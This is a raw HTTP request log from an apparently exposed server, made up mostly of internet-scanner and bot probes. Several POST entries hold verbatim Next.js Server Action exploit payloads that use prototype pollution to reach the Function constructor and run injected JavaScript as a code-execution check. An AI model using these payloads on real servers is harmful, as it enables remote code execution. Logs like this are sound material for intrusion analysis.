X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:44102
Path: /
URL: /
Method: POST
[2026-04-01 14:43:41] === HTTP Request ===
[2026-04-01 13:25:12] Main page accessed - IP: 207.90.244.27:46842
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.27:46842
Path: /
URL: /
Method: GET
[2026-04-01 13:25:12] === HTTP Request ===
===================
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept: */*
Accept-Language: en US,en;q=0.9,sv;q=0.8
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:29248
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-01 12:27:30] === HTTP Request ===
[2026-04-01 10:56:40] Main page accessed - IP: 20.15.200.1:35740
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.15.200.1:35740
Path: /
URL: /
Method: GET
[2026-04-01 10:56:40] === HTTP Request ===
[2026-04-01 10:40:30] Main page accessed - IP: 66.228.53.78:44992
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.228.53.78:44992
Path: /
URL: /
Method: GET
[2026-04-01 10:40:30] === HTTP Request ===
[2026-04-01 10:18:54] Main page accessed - IP: 34.77.166.77:52292
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.77.166.77:52292
Path: /
URL: /
Method: GET
[2026-04-01 10:18:54] === HTTP Request ===
===================
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:51476
Path: /jars
URL: /jars
Method: GET
[2026-04-01 09:16:40] === HTTP Request ===
[2026-04-01 09:02:50] Main page accessed - IP: 66.228.53.157:24496
===================
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.228.53.157:24496
Path: /
URL: /
Method: GET
[2026-04-01 09:02:50] === HTTP Request ===
[2026-04-01 08:07:33] Main page accessed - IP: 89.110.97.157:54512
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.110.97.157:54512
Path: /
URL: /
Method: GET
[2026-04-01 08:07:33] === HTTP Request ===
[2026-04-01 07:30:28] Main page accessed - IP: 193.46.255.156:37418
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 193.46.255.156:37418
Path: /
URL: /
Method: GET
[2026-04-01 07:30:28] === HTTP Request ===
[2026-04-01 05:35:08] Main page accessed - IP: 45.33.12.214:59152
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 45.33.12.214:59152
Path: /
URL: /
Method: GET
[2026-04-01 05:35:08] === HTTP Request ===
[2026-04-01 05:16:08] Main page accessed - IP: 176.65.149.45:51750
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:51750
Path: /
URL: /
Method: GET
[2026-04-01 05:16:08] === HTTP Request ===
[2026-04-01 04:35:40] Main page accessed - IP: 45.79.5.11:46990
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 45.79.5.11:46990
Path: /
URL: /
Method: GET
[2026-04-01 04:35:40] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 93.123.109.183:55562
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-01 02:26:40] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 93.123.109.183:55548
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-01 02:26:40] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 93.123.109.183:55542
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-01 02:26:40] === HTTP Request ===
[2026-04-01 01:58:41] Main page accessed - IP: 209.38.70.156:41424
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 209.38.70.156:41424
Path: /
URL: /
Method: GET
[2026-04-01 01:58:41] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:39358
Path: /jars
URL: /jars
Method: GET
[2026-04-01 01:48:58] === HTTP Request ===
===================
Connection: keep-alive
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:6626
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-01 01:36:44] === HTTP Request ===
[2026-04-01 01:33:09] Main page accessed - IP: 147.185.132.144:58696
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.144:58696
Path: /
URL: /
Method: GET
[2026-04-01 01:33:09] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.40:60520
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-01 01:25:46] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.172.40:60504
Path: *
URL: *
Method: PRI
[2026-04-01 01:25:46] === HTTP Request ===
[2026-04-01 01:25:45] Main page accessed - IP: 66.132.172.40:60496
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.40:60496
Path: /
URL: /
Method: GET
[2026-04-01 01:25:45] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.13:42958
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-31 20:20:04] === HTTP Request ===
[2026-03-31 20:20:04] Main page accessed - IP: 85.217.140.13:42956
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.13:42956
Path: /
URL: /
Method: GET
[2026-03-31 20:20:04] === HTTP Request ===
[2026-03-31 20:12:00] Main page accessed - IP: 198.235.24.175:53255
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.175:53255
Path: /
URL: /
Method: GET
[2026-03-31 20:12:00] === HTTP Request ===
===================
Accept: text/plain,text/html,*/*
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.249.68.134
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47106
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-31 19:40:09] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:37152
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-31 15:21:06] === HTTP Request ===
[2026-03-31 14:16:08] Main page accessed - IP: 143.198.150.150:40640
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 143.198.150.150:40640
Path: /
URL: /
Method: GET
[2026-03-31 14:16:08] === HTTP Request ===
===================
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
X-Forwarded-For: 74.7.241.183
From: oai-searchbot(at)openai.com
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54856
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-31 09:38:47] === HTTP Request ===
[2026-03-31 09:31:33] Main page accessed - IP: 66.228.53.46:31306
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.228.53.46:31306
Path: /
URL: /
Method: GET
[2026-03-31 09:31:33] === HTTP Request ===
[2026-03-31 08:25:15] Main page accessed - IP: 44.220.188.206:58312
===================
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/57.0.3060.87 Safari/537.32
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 44.220.188.206:58312
Path: /
URL: /
Method: GET
[2026-03-31 08:25:15] === HTTP Request ===
[2026-03-31 08:19:03] Main page accessed - IP: 172.234.217.192:28300
===================
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.234.217.192:28300
Path: /
URL: /
Method: GET
[2026-03-31 08:19:03] === HTTP Request ===
===================
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en-US,en;q=0.5
Sec-Gpc: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Referer: http://95.143.191.38:8081/
Sec-Fetch-Mode: navigate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Connection: keep-alive
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: document
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 137.184.234.41:47026
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-31 08:18:04] === HTTP Request ===
[2026-03-31 08:18:04] Main page accessed - IP: 137.184.234.41:47010
===================
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Sec-Fetch-Site: none
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Platform: "Linux"
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Connection: keep-alive
Accept-Encoding: gzip, deflate
Sec-Fetch-User: ?1
Accept-Language: en-US,en;q=0.5
Sec-Gpc: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 137.184.234.41:47010
Path: /
URL: /
Method: GET
[2026-03-31 08:18:04] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:40836
Path: /jars
URL: /jars
Method: GET
[2026-03-31 08:17:32] === HTTP Request ===
[2026-03-31 05:34:39] Main page accessed - IP: 45.79.5.11:55303
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 45.79.5.11:55303
Path: /
URL: /
Method: GET
[2026-03-31 05:34:39] === HTTP Request ===
===================
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 65.49.1.170:43269
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-03-31 05:34:27] === HTTP Request ===
[2026-03-31 05:34:13] Main page accessed - IP: 65.49.1.169:59063
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 65.49.1.169:59063
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-03-31 05:34:13] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 65.49.1.164:28943
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-31 05:33:18] === HTTP Request ===
[2026-03-31 05:32:30] Main page accessed - IP: 65.49.1.162:49398
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 65.49.1.162:49398
Path: /
URL: /
Method: GET
[2026-03-31 05:32:30] === HTTP Request ===
===================
Connection: close
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.34:55232
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-31 05:27:29] === HTTP Request ===
===================
Connection: close
Referer: http://95.143.191.38:8081
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.34:55208
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-31 05:27:28] === HTTP Request ===
[2026-03-31 05:27:27] Main page accessed - IP: 45.142.154.34:55144
===================
Connection: close
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.34:55144
Path: /
URL: /
Method: GET
[2026-03-31 05:27:27] === HTTP Request ===
[2026-03-31 05:27:26] Main page accessed - IP: 45.142.154.34:54950
===================
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.34:54950
Path: /
URL: /
Method: GET
[2026-03-31 05:27:26] === HTTP Request ===
===================
------WebKitFormBoundaryx145678610959--
------WebKitFormBoundaryx145678610959
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx145678610959
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 204213+true+713366;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx145678610959
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_145678610959
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx145678610959
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:37678
Path: /api/route
URL: /api/route
Method: POST
[2026-03-31 04:58:38] === HTTP Request ===
===================
------WebKitFormBoundaryx128439183361--
------WebKitFormBoundaryx128439183361
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx128439183361
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 58880+true+2181372;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx128439183361
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx128439183361
X-Nextjs-Request-Id: poop1234
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_128439183361
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:37638
Path: /app
URL: /app
Method: POST
[2026-03-31 04:58:38] === HTTP Request ===
===================
------WebKitFormBoundaryx1937972420425--
------WebKitFormBoundaryx1937972420425
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1937972420425
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 267534+true+7243836;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1937972420425
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1937972420425
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
X-Nextjs-Request-Id: poop1234
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1937972420425
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:37614
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-31 04:58:38] === HTTP Request ===
===================
------WebKitFormBoundaryx32327499777--
------WebKitFormBoundaryx32327499777
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx32327499777
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 75889+true+425984;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx32327499777
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 512
X-Nextjs-Html-Request-Id: ilovepoop_32327499777
Next-Action: x
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx32327499777
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:37588
Path: /api
URL: /api
Method: POST
[2026-03-31 04:58:38] === HTTP Request ===
===================
------WebKitFormBoundaryx381239963735--
------WebKitFormBoundaryx381239963735
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx381239963735
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 145667+true+2617202;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx381239963735
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_381239963735
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx381239963735
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:37538
Path: /_next
URL: /_next
Method: POST
[2026-03-31 04:58:37] === HTTP Request ===
[2026-03-31 04:58:37] Main page accessed - IP: 193.32.162.28:37486
===================
------WebKitFormBoundaryx399553774586--
------WebKitFormBoundaryx399553774586
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx399553774586
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 59009+true+6771065;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx399553774586
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx399553774586
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_399553774586
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:37486
Path: /
URL: /
Method: POST
[2026-03-31 04:58:37] === HTTP Request ===
[2026-03-31 04:35:41] Main page accessed - IP: 69.164.217.245:60290
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 69.164.217.245:60290
Path: /
URL: /
Method: GET
[2026-03-31 04:35:41] === HTTP Request ===
[2026-03-31 04:27:12] Main page accessed - IP: 198.235.24.88:56237
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.88:56237
Path: /
URL: /
Method: GET
[2026-03-31 04:27:12] === HTTP Request ===
===================
Connection: keep-alive
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:13356
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-31 04:17:52] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:55214
Path: /jars
URL: /jars
Method: GET
[2026-03-31 00:46:00] === HTTP Request ===
[2026-03-30 23:27:06] Login page accessed - IP: 193.142.146.230:38196
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.142.146.230:38196
Path: /login
URL: /login
Method: GET
[2026-03-30 23:27:06] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.172.182:62344
Path: *
URL: *
Method: PRI
[2026-03-30 20:00:38] === HTTP Request ===
[2026-03-30 20:00:33] Main page accessed - IP: 66.132.172.182:62330
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.182:62330
Path: /
URL: /
Method: GET
[2026-03-30 20:00:33] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.135:51832
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-30 18:54:20] === HTTP Request ===
[2026-03-30 18:54:18] Main page accessed - IP: 85.142.100.135:51822
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
